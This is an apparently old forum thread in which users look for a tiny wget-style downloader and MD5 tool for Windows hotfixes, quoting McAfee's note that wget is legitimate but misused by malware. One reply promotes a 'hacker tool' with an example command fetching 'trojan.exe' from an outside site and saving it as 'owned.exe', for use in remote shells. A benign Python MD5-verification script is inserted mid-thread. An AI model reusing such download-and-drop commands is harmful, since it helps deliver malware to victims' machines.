WGET & MD5


GreenMachine
HELP!

Somebody on this forum (I first thought Bilou_Gateux, then Jjazz) suggested I use WGET to download the hotfixes, and posted a link to a VERY, VERY small version of WGET. This version was one used by viruses/trojans, that would silently download a file, and then silently launch the program. The file size was, as I said, very, very small: under 10 Kb. The same person also posted a link to an equally small MD5 CheckSum routine, again under 5 Kb. The WGET routine also showed up in McAfee as a trojan/virus.

I've been searching for a few hours now, and I cannot find the post, the copy of the files I thought I had, or a link to these minuscule versions.

If anyone has a link to the post or the files, or would be so kind as to zip and attach the files, they will "make my day".

Anyone?

Thanks much, swampy.

The version I seem to remember (and I'm losing my mind trying to find) was wicked small. I think it had very limited functionality, but it would do just what I need. I'm sure someone posted it on the XPCREATE forum, and I'm going nuts trying to find it.

I guess it's bedtime in this northern, western hemisphere: maybe my memory/eyes/search will work better tomorrow.

Thanks again for posting, and the link.

They probably did customize a version of wget, and then compressed it with UPX or something similar.

I can't find a miniature version of wget, lynx, or curl for windows. :\ So I tested compressing it myself:

http://www.interlog.com/~tcharron/wgetwin.html

wget 1.5.3: compresses to 76k with UPX. I can't find anything smaller at the moment, but I will keep an eye out.

Thanks, Virindi. I'm beginning to wonder if that post has been deleted. I think it was near a post you did that mentioned the UPX compressed version. The one I saw was very very small: I think only a few Kbyte. Somehow that file led me to a site, and there was also a small FTP/Web server, which made me think of the Worm/Trojan aspect. This WGET version also launched the downloaded file, as an option. It also seemed to do little else, other than download: that is what I am looking for in the HotFix downloader. WGET has many options, most of which I would not need. I do think it was Jjazz that had posted it. (Where are you, Jjazz? Vacation time in France?)

Thanks again for the reply, but I really do want to find that version. I guess I'll just keep bumping these posts till I get it!

Sorry, I don't. I've also been googling +trojan +wget +"web server" +tutorial, in varying combinations. Checked with the AV sites, etc ... Now I'm in the process of reading every thread in this forum. Boring ...

Thanks for the suggestion!

Not a reduced wget.exe version, but a hacker tool which does its job fine:

CMDget.exe - 1.5kb - Downloads a file from a website from user provided parameters

( Example: CMDGet http://illmob.org/trojan.exe c:\>owned.exe )

md5.exe - 15kb - gets the md5 hash of a file

Small collection of tools I use regularly in a remote shell/cmd prompt:

CMDget.exe

PM sent ;)
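The thread pairs a file downloader with an MD5 check for the hotfixes. As an added example (not code from any post here, and unrelated to the tools named above), this Python script parses an md5sum-style "digest  filename" listing, an assumed format since no post specifies one, hashes each downloaded file in chunks and reports which files match their recorded digest, so only verified files are installed. File names, contents and digests are constructed.

```python
import hashlib
import hmac
import os
import tempfile

# Constructed listing in "digest  filename" layout (assumed md5sum-style format).
CHECKSUM_LISTING = """\
9e107d9d372bb6826bd81d3542a419d6  hotfix-a.exe
e4d909c290d0fb1ca068ffaddf22cbd0  hotfix-b.exe
"""

def parse_listing(text):
    """Return {filename: hexdigest} from 'digest  filename' lines; blank lines skipped."""
    expected = {}
    for line in text.splitlines():
        line = line.strip()
        if not line:
            continue
        digest, _, name = line.partition("  ")
        # md5sum marks binary-mode entries with a leading '*' on the name
        expected[name.strip().lstrip("*")] = digest.lower()
    return expected

def md5_of_file(path, chunk_size=64 * 1024):
    """Hash a file in chunks so large hotfix packages need not fit in memory."""
    h = hashlib.md5()
    with open(path, "rb") as fh:
        for chunk in iter(lambda: fh.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()

def verify_downloads(listing_text, directory):
    """Return {filename: 'ok' | 'mismatch' | 'missing'}; install only files marked 'ok'."""
    results = {}
    for name, want in parse_listing(listing_text).items():
        path = os.path.join(directory, name)
        if not os.path.isfile(path):
            results[name] = "missing"
            continue
        got = md5_of_file(path)
        # compare_digest: constant-time comparison of the two hex strings
        results[name] = "ok" if hmac.compare_digest(got, want) else "mismatch"
    return results

def demo():
    """Write two constructed files, the second altered, and verify both."""
    with tempfile.TemporaryDirectory() as d:
        for name, body in (("hotfix-a.exe", b"The quick brown fox jumps over the lazy dog"),
                           ("hotfix-b.exe", b"The quick brown fox jumps over the lazy dog!")):
            with open(os.path.join(d, name), "wb") as fh:
                fh.write(body)
        return verify_downloads(CHECKSUM_LISTING, d)
```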

The following is an excerpt from McAfee.com:

Threat Profile: Tool-WGet

Risk Assessment

- Home Users: N/A

- Corporate Users: N/A

Date Discovered: 8/1/2002

Date Added: 3/17/2004

Origin: Unknown

Length: Varies

Type: Program

SubType: Win32

DAT Required: 4218

Program Characteristics

This is not a virus or trojan. It is a legitimate application for retrieving files from the Internet via HTTP and FTP. The application has been misused by certain pieces of malware in order to facilitate remote downloads.

The exact file size varies (there are many different versions), and it may be packed with a PE packer (eg. UPX, Aspack). Malware that use this tool maliciously typically do so using the quiet switch, disabling screen output.

Users who would like to check for the presence of potentially unwanted programs on their system should run the command line scanner with the /PROGRAM switch.

Please note that VirusScan 7, and higher, has an option that enables users to detect this kind of program automatically (see below).

Symptoms

N/A This is not a virus or trojan. It is a legitimate application which enables remote files to be downloaded from the Internet via HTTP or FTP.

Removal Instructions

For VirusScan 4.x users who would like to detect this program on their system, they can run the command line scanner with the /PROGRAM switch.

Click the START button

Click RUN

Type COMMAND and hit ENTER

Type:

c:\progra~1\common~1\networ~1\viruss~1\4.0.xx\scan.exe c: /program /sub

and hit ENTER.

Users running VirusScan 7 or later can also enable application or joke detection via the configuration option "Find potentially unwanted programs" (Advanced section - see example below), within the VirusScan GUI as shown below:

Corporate Users:

This applies for the VirusScan 7 Enterprise On-Access scanner too.

Retail Users:

This does not apply for the VirusScan 7 Retail On-Access scanner.

(Pictures omitted.) HTH.

For a link to the exact place at McAfee.com:

W-Get virus information.

*edit* google search for: PE Packer W-Get

I also found this too, http://www.msfn.org/board/index.php?act=ST&f=80&t=16094 not sure if that's what you're looking for or not, both Aaron and Bombtrack mention it. Bombtrack has the instructions for it in his post. Not sure if that's what you're looking for though or not. When you do the search use W-Get that may help you find what you're looking for.
